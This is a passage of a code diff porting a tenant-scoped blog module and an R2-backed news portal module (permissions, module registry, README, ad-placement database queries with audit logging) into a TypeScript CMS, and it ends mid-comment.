+    "Tenant-scoped blog/content management, ported from awcms-mini (epic #536, issues #537-#543 plus the later #636-#649/#681 hardening lineage — see README.md for the full port-adaptation notes). Admin CRUD + lifecycle for posts/pages (draft -> review -> scheduled/published -> archived, soft delete/restore/purge), hierarchical categories/tags with post-term relations, PostgreSQL full-text search, append-only revision history (restore never overwrites, it appends a new revision), presentation/monetization extensions (templates, hierarchical menus, position-based widgets, advertisements with placement targeting/scheduling, a per-tenant theme override falling back to `awcms_tenants.default_theme`), an optional `translation_group_id` linking locale-variants of one post, a whitelisted `gallery`/`video_news` content_json block type (no raw HTML, no new media table), per-tenant blog settings (title/description/RSS/sitemap flags), and automatic internal tag linking (a pure render-time transform, `domain/internal-tag-linking.ts`, gated by a deployment-wide config plus a per-tenant policy table and a per-post opt-out column). Public (anonymous) routes under `/blog/{tenantCode}/...` per ADR-0009 (index, post detail, category/tag archive, search, RSS feed, sitemap) reuse the `resolvePublicTenantByCode` resolver theming's own public preview route already established in this base. PORT-TIME DROPS (documented in the port PR, not silent): the host-resolved `/news/**` route family (Issue #560/#564, epic `news_portal`) is NOT ported — it requires `lib/tenant/public-host-tenant-resolver.ts` (custom-domain-based tenant resolution) and `PUBLIC_TENANT_RESOLUTION_MODE`/`PUBLIC_TRUST_PROXY` env plumbing that belong to the `tenant_domain` routing module, which is not yet ported to this base; the three `/news`-only settings keys (`publicRouteMode`/`publicBasePath`/`publicLabel`) are dropped from `settings.defaults` for the same reason, keeping only `legacyTenantRouteEnabled` (the `/blog/{tenantCode}` on/off switch). The full-online-R2-only-mode media-reference enforcement (Issue #636/#639/#640/#649, gated by the `news_media` capability below) and the publish-time social-publishing outbox trigger (Issue #643, gated by the `social_publishing` capability below) both consume a REQUIRED port parameter at their call sites; since neither `news_portal` nor `social_publishing` is ported yet, every route/worker call site here injects this module's own no-op adapters (`application/news-media-port-noop-adapter.ts`, `application/social-publishing-port-noop-adapter.ts`) instead of importing an absent module's concrete adapter — R2-only mode always reports inactive (every affected gate/checklist becomes the same no-op it already is for every tenant that hasn't opted into that mode) and the social-publishing hook always reports `{ jobsCreated: 0 }`, both exactly matching the documented base-case behavior. Swapping in the real adapters is a pure composition-root change (no `blog_content` file touched) once those modules are ported.",
+  // `module_management` + `logging` are real value imports this module
+  // already makes — `application/public-route-settings.ts` calls
+  // `module_management`'s tenant-module/settings helpers, and
+  // `application/blog-scheduled-publish.ts` calls `logging`'s
+  // `recordAuditEvent`. Declaring them keeps `modules:dag:check` acyclic
+  // (both are foundation modules that never depend back on `blog_content`).
+  dependencies: [
+    "tenant_admin",
+    "identity_access",
+    "module_management",
+    "logging"
+  ],
+  type: "domain",
+  // This module PROVIDES the `public_content` capability
+  // (`_shared/ports/public-content-port.ts`, implemented by
+  // `application/public-content-port-adapter.ts`) for a future `news_portal`
+  // port's homepage section composer to consume, and CONSUMES (both
+  // `optional: true`) `news_portal`'s `news_media` capability and
+  // `social_publishing`'s own `social_publishing` capability. Neither
+  // direction is a `dependencies` edge (capabilities document a
+  // SOURCE-LEVEL relationship, not a lifecycle-ordering constraint). Since
+  // NEITHER `news_portal` NOR `social_publishing` is ported to this base yet,
+  // every real call site injects this module's own no-op adapter instead of
+  // an absent module's concrete one — see the description field above and
+  // `application/news-media-port-noop-adapter.ts`/
+  // `application/social-publishing-port-noop-adapter.ts`'s own headers.
+  // `optional: true` is exactly what makes that safe: a deployment that
+  // never has `news_media`/`social_publishing` provided (every deployment of
+  // this base today) must still fully validate/publish articles, just
+  // without the extra R2/social-outbox behavior.
+  capabilities: {
+    provides: ["public_content"],
+    consumes: [
+      { capability: "news_media", providedBy: "news_portal", optional: true },
+      {
+        capability: "social_publishing",
+        providedBy: "social_publishing",
+        optional: true
+      }
+    ]
+  },
+  navigation: [
+    {
+      labelKey: "admin.layout.nav_blog",
+      path: "/admin/blog",
+      order: 40,
+      requiredPermission: "blog_content.posts.read"
+    }
+  ],
+  permissions: [
+    { activityCode: "posts", action: "read", description: "Read blog posts" },
+    {
+      activityCode: "posts",
+      action: "create",
+      description: "Create blog posts"
+    },
+    {
+      activityCode: "posts",
+      action: "update",
+      description: "Update blog posts"
+    },
+    {
+      activityCode: "posts",
+      action: "publish",
+      description: "Publish blog posts"
+    },
+    {
+      activityCode: "posts",
+      action: "schedule",
+      description: "Schedule blog posts for future publishing"
+    },
+    {
+      activityCode: "posts",
+      action: "archive",
+      description: "Archive blog posts"
+    },
+    {
+      activityCode: "posts",
+      action: "delete",
+      description: "Soft delete blog posts"
+    },
+    {
+      activityCode: "posts",
+      action: "restore",
+      description: "Restore soft-deleted blog posts"
+    },
+    {
+      activityCode: "posts",
+      action: "purge",
+      description: "Purge soft-deleted blog posts"
+    },
+    {
+      activityCode: "posts",
+      action: "export",
+      description: "Export blog posts"
+    },
+    { activityCode: "pages", action: "read", description: "Read blog pages" },
+    {
+      activityCode: "pages",
+      action: "create",
+      description: "Create blog pages"
+    },
+    {
+      activityCode: "pages",
+      action: "update",
+      description: "Update blog pages"
+    },
+    {
+      activityCode: "pages",
+      action: "publish",
+      description: "Publish blog pages"
+    },
+    {
+      activityCode: "pages",
+      action: "archive",
+      description: "Archive blog pages"
+    },
+    {
+      activityCode: "pages",
+      action: "delete",
+      description: "Soft delete blog pages"
+    },
+    {
+      activityCode: "pages",
+      action: "restore",
+      description: "Restore soft-deleted blog pages"
+    },
+    {
+      activityCode: "pages",
+      action: "purge",
+      description: "Purge soft-deleted blog pages"
+    },
+    {
+      activityCode: "taxonomies",
+      action: "read",
+      description: "Read blog categories and tags"
+    },
+    {
+      activityCode: "taxonomies",
+      action: "configure",
+      description: "Create, update, or delete blog categories and tags"
+    },
+    {
+      activityCode: "revisions",
+      action: "read",
+      description: "Read blog post/page revision history"
+    },
+    {
+      activityCode: "revisions",
+      action: "restore",
+      description: "Restore a blog post/page revision"
+    },
+    {
+      activityCode: "settings",
+      action: "read",
+      description: "Read blog module settings"
+    },
+    {
+      activityCode: "settings",
+      action: "configure",
+      description: "Update blog module settings"
+    },
+    {
+      activityCode: "seo",
+      action: "configure",
+      description: "Configure blog SEO metadata defaults"
+    },
+    {
+      activityCode: "search",
+      action: "read",
+      description: "Search blog posts and pages"
+    },
+    {
+      activityCode: "templates",
+      action: "read",
+      description: "Read blog presentation templates"
+    },
+    {
+      activityCode: "templates",
+      action: "configure",
+      description: "Create, update, or delete blog presentation templates"
+    },
+    {
+      activityCode: "menus",
+      action: "read",
+      description: "Read blog navigation menus"
+    },
+    {
+      activityCode: "menus",
+      action: "configure",
+      description: "Create, update, or delete blog navigation menus"
+    },
+    {
+      activityCode: "widgets",
+      action: "read",
+      description: "Read blog widgets"
+    },
+    {
+      activityCode: "widgets",
+      action: "configure",
+      description: "Create, update, or delete blog widgets"
+    },
+    {
+      activityCode: "ads",
+      action: "read",
+      description: "Read blog advertisements"
+    },
+    {
+      activityCode: "ads",
+      action: "configure",
+      description: "Create, update, or delete blog advertisements"
+    },
+    {
+      activityCode: "theme",
+      action: "read",
+      description: "Read blog theme mode setting"
+    },
+    {
+      activityCode: "theme",
+      action: "configure",
+      description: "Update blog theme mode setting"
+    },
+    // Issue #641 — deliberately separate from `settings.*` (see migration
+    // 050's header comment for why this policy lives in its own dedicated
+    // table/endpoint rather than folded into `awcms_blog_settings`).
+    {
+      activityCode: "internal_links",
+      action: "read",
+      description: "Read automatic internal tag linking settings"
+    },
+    {
+      activityCode: "internal_links",
+      action: "configure",
+      description: "Configure automatic internal tag linking settings"
+    },
+    {
+      activityCode: "internal_links",
+      action: "preview",
+      description:
+        "Preview automatic internal tag links for a post before publishing"
+    }
+  ],
+  api: {
+    openApiPath: "openapi/awcms-public-api.openapi.yaml",
+    basePath: "/api/v1/blog"
+  },
+  // Non-secret public-route-behavior preference, read/written through
+  // Module Management's existing generic framework (GET/PATCH
+  // /api/v1/tenant/modules/blog_content/settings), not a bespoke settings
+  // mechanism.
+  //
+  // PORT-TIME DROP: awcms-mini's equivalent field also carried
+  // `publicRouteMode`/`publicBasePath`/`publicLabel` — three knobs that only
+  // ever govern the host-resolved `/news/**` route family. That family is
+  // not ported (see this module's own `description` field above), so those
+  // three keys are dropped here rather than kept as dead configuration for a
+  // route family that does not exist in this base. `legacyTenantRouteEnabled`
+  // is kept because it independently gates the `/blog/{tenantCode}` family,
+  // which IS ported.
+  //
+  // DELIBERATELY DOES NOT INCLUDE `rssEnabled`/`sitemapEnabled` — those two
+  // flags live in, and stay in, `awcms_blog_settings`
+  // (`application/blog-settings-directory.ts`'s `fetchBlogSettings`, written
+  // via `PATCH /api/v1/blog/settings`). Duplicating them into this second
+  // store would create two disconnected, independently-writable sources of
+  // truth for the same concept. See `application/public-route-settings.ts`'s
+  // header comment for the full reasoning.
+  settings: {
+    schemaVersion: 1,
+    defaults: {
+      // Default true = today's behavior unchanged: /blog/{tenantCode}
+      // remains fully available (the legacy family is never removed by
+      // default). Setting this false disables all 7 /blog/{tenantCode}
+      // routes (index/detail/category/tag/search/feed/sitemap) with the
+      // same generic 404 shape as an unknown tenant code — a
+      // tenant-chosen opt-out, not a removal of the route family itself.
+      legacyTenantRouteEnabled: true
+    }
+  },
+  events: {
+    asyncApiPath: "asyncapi/awcms-domain-events.asyncapi.yaml",
+    publishes: [
+      "awcms.blog-content.post.created",
+      "awcms.blog-content.post.updated",
+      "awcms.blog-content.post.submitted-for-review",
+      "awcms.blog-content.post.published",
+      "awcms.blog-content.post.scheduled",
+      "awcms.blog-content.post.archived",
+      "awcms.blog-content.post.deleted",
+      "awcms.blog-content.post.restored",
+      "awcms.blog-content.post.purged",
+      "awcms.blog-content.revision.created",
+      "awcms.blog-content.term.created",
+      "awcms.blog-content.term.updated",
+      "awcms.blog-content.settings.updated",
+      "awcms.blog-content.template.created",
+      "awcms.blog-content.template.updated",
+      "awcms.blog-content.template.deleted",
+      "awcms.blog-content.menu.created",
+      "awcms.blog-content.menu.updated",
+      "awcms.blog-content.menu.deleted",
+      "awcms.blog-content.widget.created",
+      "awcms.blog-content.widget.updated",
+      "awcms.blog-content.widget.deleted",
+      "awcms.blog-content.ad.created",
+      "awcms.blog-content.ad.updated",
+      "awcms.blog-content.ad.deleted",
+      "awcms.blog-content.theme.updated",
+      "awcms.blog-content.internal-tag-linking-policy.updated"
+    ]
+  },
+  jobs: [
+    {
+      command: "bun run blog:publish:scheduled",
+      purpose:
+        "Publish every due `status='scheduled'` blog post (scheduled_at <= now()) for every active tenant. Idempotent — a post already published, or still in the future, is a no-op on re-run.",
+      recommendedSchedule: "Every 1-5 minutes via cron/systemd timer.",
+      environmentNotes:
+        "No external provider call — pure database transition, safe to run in any deployment profile.",
+      safeInOfflineLan: true
+    }
+  ]
+});

--- a/src/modules/identity-access/domain/access-control.ts
+++ b/src/modules/identity-access/domain/access-control.ts
@@ -67,7 +67,14 @@ export type AccessAction =
   // Theming (ADR-0034 Fase 3): `archive` retires the active theme so the site
   // falls back to the default. High-risk (it changes the live public
   // presentation surface), same posture as `publish`/`restore`.
-  | "archive";
+  | "archive"
+  // Blog content (ported from awcms-mini): `schedule` sets a post/page's
+  // future `scheduled_at` (high-risk, same posture as `publish` — it commits
+  // to a future state transition). `preview` is read-only (previews the
+  // automatic internal tag linking transform for a post before publishing,
+  // not itself a mutation).
+  | "schedule"
+  | "preview";
 
 export type AccessRequest = {
   moduleKey: string;

--- a/src/modules/identity-access/domain/access-control.ts
+++ b/src/modules/identity-access/domain/access-control.ts
@@ -74,7 +74,17 @@ export type AccessAction =
   // automatic internal tag linking transform for a post before publishing,
   // not itself a mutation).
   | "schedule"
-  | "preview";
+  | "preview"
+  // News portal (ported from awcms-mini): `verify` finalizes an uploaded news
+  // media object (flips its status based on server-side MIME/checksum
+  // verification). Deliberately NOT in `HIGH_RISK_ACTIONS` — it only advances
+  // a media object's own status, does not delete or irreversibly change data;
+  // the finalize endpoint still requires `Idempotency-Key` and is audited
+  // regardless of this classification (`isHighRiskAction` is metadata, not a
+  // gate on idempotency/audit). (`attach`/`detach`/`delete`/`restore`/`purge`/
+  // `cancel` are also seeded in the `news_portal.media` permission catalog but
+  // reuse existing union members / are not yet authorized by any ported route.)
+  | "verify";
 
 export type AccessRequest = {
   moduleKey: string;

--- a/src/modules/index.ts
+++ b/src/modules/index.ts
@@ -11,6 +11,7 @@ import { emailModule } from "./email/module";
 import { reportingModule } from "./reporting/module";
 import { themingModule } from "./theming/module";
 import { blogContentModule } from "./blog-content/module";
+import { newsPortalModule } from "./news-portal/module";
 
 /**
  * The reviewed BASE registry. Every module below is reviewed, in-repo code.
@@ -35,7 +36,16 @@ const baseModules: ModuleDescriptor[] = [
   // above in this list, so the DAG stays acyclic. See
   // src/modules/blog-content/module.ts and module.ts's own `description`
   // field for what was ported vs. dropped.
-  blogContentModule
+  blogContentModule,
+  // Ported from awcms-mini (R2-only news media registry + presigned upload
+  // flow, editorial homepage sections, R2-only ad placements, and the
+  // news-media reconciliation job). Depends on
+  // tenant_admin/identity_access/module_management/logging (all above);
+  // PROVIDES `news_media` (consumed by blog_content) and CONSUMES
+  // blog_content's `public_content`, but capability edges are not DAG edges,
+  // so the graph stays acyclic. See src/modules/news-portal/module.ts's
+  // `description` for what was ported vs. dropped.
+  newsPortalModule
 ];
 
 /**

--- a/src/modules/index.ts
+++ b/src/modules/index.ts
@@ -10,6 +10,7 @@ import { workflowApprovalModule } from "./workflow-approval/module";
 import { emailModule } from "./email/module";
 import { reportingModule } from "./reporting/module";
 import { themingModule } from "./theming/module";
+import { blogContentModule } from "./blog-content/module";
 
 /**
  * The reviewed BASE registry. Every module below is reviewed, in-repo code.
@@ -28,7 +29,13 @@ const baseModules: ModuleDescriptor[] = [
   // ADR-0034 Fase 3 — the first website module implemented directly in the base
   // (depends only on the two Core modules; provides no capability, so the DAG is
   // unchanged). See src/modules/theming/README.md.
-  themingModule
+  themingModule,
+  // Ported from awcms-mini (tenant-scoped blog/content management). Depends
+  // on tenant_admin/identity_access/module_management/logging, all already
+  // above in this list, so the DAG stays acyclic. See
+  // src/modules/blog-content/module.ts and module.ts's own `description`
+  // field for what was ported vs. dropped.
+  blogContentModule
 ];
 
 /**

--- a/src/modules/news-portal/README.md
+++ b/src/modules/news-portal/README.md
@@ -1,0 +1,96 @@
+# News Portal
+
+R2-only news media + editorial layer, **ported from awcms-mini** (epic
+`news_portal` #631-#642/#649/#681/#690). Depends only on foundation modules
+(`tenant_admin`, `identity_access`, `module_management`, `logging`). This
+module PROVIDES the `news_media` capability that `blog_content` consumes, and
+CONSUMES `blog_content`'s `public_content` capability — both wired at the
+composition root through `_shared/ports/`, never a raw cross-module import.
+
+## What this module ships
+
+- **Tenant-scoped, R2-only media object registry** (`awcms_news_media_objects`,
+  `sql/041`) — metadata only; image bytes live in Cloudflare R2. Direct-to-R2
+  presigned upload flow:
+  - `POST /api/v1/media/news-images/upload-sessions` — create a
+    `pending_upload` row + short-lived presigned PUT URL (credentials never
+    exposed to the browser).
+  - `POST /api/v1/media/news-images/upload-sessions/{id}/finalize` — real R2
+    HEAD + full GET, magic-byte MIME sniffing, and a server-side SHA-256
+    checksum (never a bare HEAD). Requires `Idempotency-Key`.
+  - `POST /api/v1/media/news-images/upload-sessions/{id}/cancel`.
+- **Editorial homepage section composer** (`awcms_news_portal_homepage_sections`,
+  `sql/044`) — admin CRUD at `/api/v1/news-portal/homepage-sections`
+  (`GET`/`POST`) and `.../{id}` (`PATCH`/`DELETE`), with write-time reference
+  validation against `blog_content` (via `public_content`) and the media
+  registry.
+- **R2-only advertisement placement presets**
+  (`awcms_news_portal_ad_placements`, `sql/045`) — admin CRUD at
+  `/api/v1/news-portal/ad-placements`. Every row references a verified R2
+  media object by a real FK, so R2-only-ness holds by construction.
+- **Reconciliation job** — `bun run news-media:reconcile`
+  (`scripts/news-media-r2-reconcile.ts`) reconciles registry metadata against
+  the real R2 bucket, cleaning up expired pending uploads and grace-period
+  orphans in bounded, race-safe batches. No-op unless `NEWS_MEDIA_R2_ENABLED`.
+  Runs as the least-privilege `awcms_worker` role (grant in `sql/041`).
+
+## Migrations & RLS
+
+`sql/041`..`sql/045`. Four new tenant-scoped tables, each `ENABLE` +
+**`FORCE ROW LEVEL SECURITY`** with the standard
+`tenant_id = current_setting('app.current_tenant_id')::uuid` policy:
+`awcms_news_media_objects`, `awcms_news_portal_tenant_state`,
+`awcms_news_portal_homepage_sections`, `awcms_news_portal_ad_placements`.
+`sql/042` seeds the `news_portal.media.*` permission catalog; `sql/044`/`sql/045`
+seed the `homepage_sections`/`ad_placements` `read`/`configure` pairs.
+
+## Port-time drops (documented, not silent)
+
+- **Host-resolved `/news/**` public routes** (index/detail/category/tag/search/
+  feed/sitemap) are NOT ported — they require `tenant_domain`'s custom-domain
+  resolver + `PUBLIC_TENANT_RESOLUTION_MODE` plumbing, not yet in this base.
+  The `/news`-only render helpers (`homepage-section-composer.ts`,
+  `homepage-section-rendering.ts`, `news-share-config.ts`) are dropped with
+  them.
+- **Per-module `.astro` admin pages** are not ported (this base has no
+  per-module admin UI yet). The `navigation` entries in `module.ts` are
+  descriptor metadata only — same convention `blog_content`'s `/admin/blog`
+  entry uses.
+- **Preset activation** (`apply-news-portal-preset.ts` + the
+  `news_portal_full_online_r2` module preset) is dropped because
+  `module_management`'s preset subsystem (`applyModulePreset`/`MODULE_PRESETS`)
+  is not ported. The `awcms_news_portal_tenant_state` marker table (`sql/043`)
+  and its read helper are retained (forward-compatible), but with no writer the
+  `news_media` port's `isFullOnlineR2ModeActiveForTenant` always resolves
+  `false` — identical net behavior to `blog_content`'s prior no-op adapter,
+  while the registry/upload/homepage/ads surfaces all work independently.
+
+## `news_media` capability — real adapter
+
+`application/news-media-port-adapter.ts` (`newsMediaPortAdapter`) implements
+`_shared/ports/news-media-port.ts`. This port replaces `blog_content`'s
+port-time `noopNewsMediaPortAdapter` at every composition root (blog admin
+routes, `/blog/{tenantCode}` public routes, and the `blog:publish:scheduled`
+worker). `blog_content`'s own `application`/`domain` code is untouched — only
+the injected adapter changed.
+
+## Env var naming — `NEWS_MEDIA_R2_*`, not `R2_*`
+
+`sync-storage` already uses `R2_*` for its **private** offline/LAN object
+queue. News media R2 is a **public** concern (custom domain, CORS
+direct-upload) requiring a fully separate bucket/credentials, so it uses the
+`NEWS_MEDIA_R2_*` prefix (`domain/news-media-r2-config.ts`).
+
+## No local filesystem fallback
+
+This mode never stores news image bytes on local disk — there is no such code
+path to disable. `tests/news-portal-no-local-fallback.test.ts` enforces this
+structurally (grepping the module + route trees), failing loudly the moment
+any PR adds a local write for news media bytes.
+
+## References
+
+- `.claude/skills/awcms-news-portal/SKILL.md` — target-spec context for this
+  port.
+- `src/modules/sync-storage/README.md` — the pre-existing private R2 usage,
+  deliberately separate from this module.

--- a/src/modules/news-portal/application/ad-placement-directory.ts
+++ b/src/modules/news-portal/application/ad-placement-directory.ts
@@ -1,0 +1,387 @@
+import { escapeHtml } from "../../../lib/html/escape";
+import { recordAuditEvent } from "../../logging/application/audit-log";
+import type {
+  AdPlacementKey,
+  AdRotationMode,
+  CreateAdPlacementInput,
+  UpdateAdPlacementInput
+} from "../domain/ad-placement-policy";
+import { AD_PLACEMENT_PRESETS } from "../domain/ad-placement-policy";
+import {
+  selectAdsForRotation,
+  type AdRotationCandidate
+} from "../domain/ad-placement-rotation";
+import { isNewsMediaObjectSafeForPublicReference } from "./news-media-object-directory";
+
+/**
+ * Read/write query module for `awcms_news_portal_ad_placements`
+ * (Issue #638) — same "one directory, reads and writes" convention as
+ * `ads-directory.ts`/`homepage-section-directory.ts`. The column list is
+ * repeated literally at each query site (not factored into a shared
+ * fragment), same convention every other directory module in this repo
+ * uses.
+ */
+export type AdPlacementView = {
+  id: string;
+  tenantId: string;
+  placementKey: AdPlacementKey;
+  name: string;
+  mediaObjectId: string;
+  linkUrl: string | null;
+  rotationMode: AdRotationMode;
+  priority: number;
+  isActive: boolean;
+  startsAt: Date | null;
+  endsAt: Date | null;
+  createdAt: Date;
+  updatedAt: Date;
+  deletedAt: Date | null;
+  deletedBy: string | null;
+  deleteReason: string | null;
+};
+
+type AdPlacementRow = {
+  id: string;
+  tenant_id: string;
+  placement_key: AdPlacementKey;
+  name: string;
+  media_object_id: string;
+  link_url: string | null;
+  rotation_mode: AdRotationMode;
+  priority: number;
+  is_active: boolean;
+  starts_at: Date | null;
+  ends_at: Date | null;
+  created_at: Date;
+  updated_at: Date;
+  deleted_at: Date | null;
+  deleted_by: string | null;
+  delete_reason: string | null;
+};
+
+function toView(row: AdPlacementRow): AdPlacementView {
+  return {
+    id: row.id,
+    tenantId: row.tenant_id,
+    placementKey: row.placement_key,
+    name: row.name,
+    mediaObjectId: row.media_object_id,
+    linkUrl: row.link_url,
+    rotationMode: row.rotation_mode,
+    priority: row.priority,
+    isActive: row.is_active,
+    startsAt: row.starts_at,
+    endsAt: row.ends_at,
+    createdAt: row.created_at,
+    updatedAt: row.updated_at,
+    deletedAt: row.deleted_at,
+    deletedBy: row.deleted_by,
+    deleteReason: row.delete_reason
+  };
+}
+
+const AUDIT_MODULE_KEY = "news_portal";
+const AUDIT_RESOURCE_TYPE = "news_portal_ad_placement";
+
+export async function createAdPlacement(
+  tx: Bun.SQL,
+  tenantId: string,
+  actorTenantUserId: string,
+  input: CreateAdPlacementInput,
+  correlationId?: string
+): Promise<AdPlacementView> {
+  const rows = (await tx`
+    INSERT INTO awcms_news_portal_ad_placements
+      (tenant_id, placement_key, name, media_object_id, link_url, rotation_mode,
+       priority, is_active, starts_at, ends_at)
+    VALUES (
+      ${tenantId}, ${input.placementKey}, ${input.name}, ${input.mediaObjectId},
+      ${input.linkUrl}, ${input.rotationMode}, ${input.priority}, ${input.isActive},
+      ${input.startsAt}, ${input.endsAt}
+    )
+    RETURNING id, tenant_id, placement_key, name, media_object_id, link_url,
+      rotation_mode, priority, is_active, starts_at, ends_at, created_at,
+      updated_at, deleted_at, deleted_by, delete_reason
+  `) as AdPlacementRow[];
+
+  const created = toView(rows[0]!);
+
+  await recordAuditEvent(tx, {
+    tenantId,
+    actorTenantUserId,
+    moduleKey: AUDIT_MODULE_KEY,
+    action: "news_portal.ad_placement.created",
+    resourceType: AUDIT_RESOURCE_TYPE,
+    resourceId: created.id,
+    severity: "info",
+    message: `Ad placement created: ${created.placementKey} (${created.name}).`,
+    attributes: { placementKey: created.placementKey },
+    correlationId
+  });
+
+  return created;
+}
+
+export async function fetchAdPlacementById(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string
+): Promise<AdPlacementView | null> {
+  const rows = (await tx`
+    SELECT id, tenant_id, placement_key, name, media_object_id, link_url,
+      rotation_mode, priority, is_active, starts_at, ends_at, created_at,
+      updated_at, deleted_at, deleted_by, delete_reason
+    FROM awcms_news_portal_ad_placements
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+  `) as AdPlacementRow[];
+
+  const row = rows[0];
+  return row ? toView(row) : null;
+}
+
+/** Admin listing — every non-deleted ad placement (active or not, in/out of schedule window). */
+export async function listAdPlacements(
+  tx: Bun.SQL,
+  tenantId: string
+): Promise<AdPlacementView[]> {
+  const rows = (await tx`
+    SELECT id, tenant_id, placement_key, name, media_object_id, link_url,
+      rotation_mode, priority, is_active, starts_at, ends_at, created_at,
+      updated_at, deleted_at, deleted_by, delete_reason
+    FROM awcms_news_portal_ad_placements
+    WHERE tenant_id = ${tenantId} AND deleted_at IS NULL
+    ORDER BY placement_key ASC, priority DESC, created_at DESC
+    LIMIT 500
+  `) as AdPlacementRow[];
+
+  return rows.map(toView);
+}
+
+export async function updateAdPlacement(
+  tx: Bun.SQL,
+  tenantId: string,
+  actorTenantUserId: string,
+  id: string,
+  input: UpdateAdPlacementInput,
+  correlationId?: string
+): Promise<AdPlacementView | null> {
+  const rows = (await tx`
+    UPDATE awcms_news_portal_ad_placements
+    SET placement_key = COALESCE(${input.placementKey ?? null}, placement_key),
+        name = COALESCE(${input.name ?? null}, name),
+        media_object_id = COALESCE(${input.mediaObjectId ?? null}, media_object_id),
+        link_url = CASE WHEN ${input.linkUrl === undefined} THEN link_url ELSE ${input.linkUrl ?? null} END,
+        rotation_mode = COALESCE(${input.rotationMode ?? null}, rotation_mode),
+        priority = COALESCE(${input.priority ?? null}, priority),
+        is_active = COALESCE(${input.isActive ?? null}, is_active),
+        starts_at = CASE WHEN ${input.startsAt === undefined} THEN starts_at ELSE ${input.startsAt ?? null} END,
+        ends_at = CASE WHEN ${input.endsAt === undefined} THEN ends_at ELSE ${input.endsAt ?? null} END,
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+    RETURNING id, tenant_id, placement_key, name, media_object_id, link_url,
+      rotation_mode, priority, is_active, starts_at, ends_at, created_at,
+      updated_at, deleted_at, deleted_by, delete_reason
+  `) as AdPlacementRow[];
+
+  const updated = rows[0] ? toView(rows[0]) : null;
+  if (!updated) return null;
+
+  await recordAuditEvent(tx, {
+    tenantId,
+    actorTenantUserId,
+    moduleKey: AUDIT_MODULE_KEY,
+    action: "news_portal.ad_placement.updated",
+    resourceType: AUDIT_RESOURCE_TYPE,
+    resourceId: id,
+    severity: "info",
+    message: `Ad placement updated: ${updated.placementKey} (${updated.name}).`,
+    attributes: { placementKey: updated.placementKey },
+    correlationId
+  });
+
+  return updated;
+}
+
+export async function softDeleteAdPlacement(
+  tx: Bun.SQL,
+  tenantId: string,
+  actorTenantUserId: string,
+  id: string,
+  reason: string,
+  correlationId?: string
+): Promise<boolean> {
+  const rows = (await tx`
+    UPDATE awcms_news_portal_ad_placements
+    SET deleted_at = now(), deleted_by = ${actorTenantUserId}, delete_reason = ${reason},
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+    RETURNING placement_key
+  `) as { placement_key: AdPlacementKey }[];
+
+  if (rows.length === 0) return false;
+
+  await recordAuditEvent(tx, {
+    tenantId,
+    actorTenantUserId,
+    moduleKey: AUDIT_MODULE_KEY,
+    action: "news_portal.ad_placement.deleted",
+    resourceType: AUDIT_RESOURCE_TYPE,
+    resourceId: id,
+    severity: "warning",
+    message: "Ad placement deleted.",
+    attributes: { placementKey: rows[0]!.placement_key, reason },
+    correlationId
+  });
+
+  return true;
+}
+
+export type ActiveAdPlacementForRendering = {
+  id: string;
+  name: string;
+  linkUrl: string | null;
+  rotationMode: AdRotationMode;
+  priority: number;
+  createdAt: Date;
+  mediaPublicUrl: string;
+  mediaAltText: string | null;
+};
+
+type ActiveAdPlacementRow = {
+  id: string;
+  name: string;
+  link_url: string | null;
+  rotation_mode: AdRotationMode;
+  priority: number;
+  created_at: Date;
+  media_public_url: string;
+  media_alt_text: string | null;
+};
+
+/**
+ * Public-safe query for one placement — tenant-scoped (explicit
+ * `tenant_id = $1` predicate, RLS FORCE'd defense in depth, same convention
+ * `ads-directory.ts`'s `listActiveAdsForPlacement` uses), `is_active =
+ * true`, within the schedule window (`starts_at`/`ends_at` NULL-permissive),
+ * AND joined against the media registry so only a `verified`/`attached`
+ * (i.e. `isNewsMediaObjectSafeForPublicReference`) media object's
+ * server-generated `public_url` is ever returned — never a client-supplied
+ * URL, because there is no such column on this table at all. A row whose
+ * media object has since been soft-deleted/orphaned/failed verification is
+ * silently excluded here (degrade, don't error), same "a section existing
+ * doesn't mean everything it references is still safe" caveat
+ * `homepage-section-directory.ts`'s equivalent query documents.
+ *
+ * Not wired to any public page route in this issue — same "tested
+ * public-safe helper, wiring is a later issue's job" precedent
+ * `listActiveAdsForPlacement` (#542) set, and `homepage-section-composer.ts`
+ * (#637) explicitly deferred `ad_slot` integration to this issue's R2-only
+ * ad system existing first. A derived app or a later issue's homepage/
+ * article template work calls `selectAndRenderActiveAdsForPlacement`
+ * directly.
+ */
+export async function listActiveAdPlacementsForRendering(
+  tx: Bun.SQL,
+  tenantId: string,
+  placementKey: AdPlacementKey,
+  now: Date = new Date()
+): Promise<ActiveAdPlacementForRendering[]> {
+  const rows = (await tx`
+    SELECT p.id, p.name, p.link_url, p.rotation_mode, p.priority, p.created_at,
+      m.public_url AS media_public_url, m.alt_text AS media_alt_text,
+      m.status AS media_status
+    FROM awcms_news_portal_ad_placements p
+    JOIN awcms_news_media_objects m
+      ON m.id = p.media_object_id AND m.tenant_id = p.tenant_id
+    WHERE p.tenant_id = ${tenantId} AND p.deleted_at IS NULL AND p.is_active = true
+      AND p.placement_key = ${placementKey}
+      AND (p.starts_at IS NULL OR p.starts_at <= ${now})
+      AND (p.ends_at IS NULL OR p.ends_at >= ${now})
+      AND m.deleted_at IS NULL
+    ORDER BY p.created_at DESC
+  `) as (ActiveAdPlacementRow & { media_status: string })[];
+
+  return rows
+    .filter((row) =>
+      isNewsMediaObjectSafeForPublicReference(
+        row.media_status as Parameters<
+          typeof isNewsMediaObjectSafeForPublicReference
+        >[0]
+      )
+    )
+    .map((row) => ({
+      id: row.id,
+      name: row.name,
+      linkUrl: row.link_url,
+      rotationMode: row.rotation_mode,
+      priority: row.priority,
+      createdAt: row.created_at,
+      mediaPublicUrl: row.media_public_url,
+      mediaAltText: row.media_alt_text
+    }));
+}
+
+/**
+ * Whitelist render — `<img>` wrapped in `<a rel="sponsored noopener
+ * noreferrer">` only when `linkUrl` is set, both attributes escaped, no
+ * other markup possible (Issue #638 §Security notes: "Advertisement
+ * rendering must not become an XSS channel"). `mediaPublicUrl` is always
+ * the registry's own server-generated public URL (never client input,
+ * see `news-media-object-key.ts`'s `buildNewsMediaPublicUrl`); `linkUrl` was
+ * already write-time validated as an absolute http(s) URL
+ * (`ad-placement-policy.ts`'s `isSafeAdLinkUrl`) — escaped here purely for
+ * HTML-attribute safety, not URL-scheme re-validation. Same `rel`
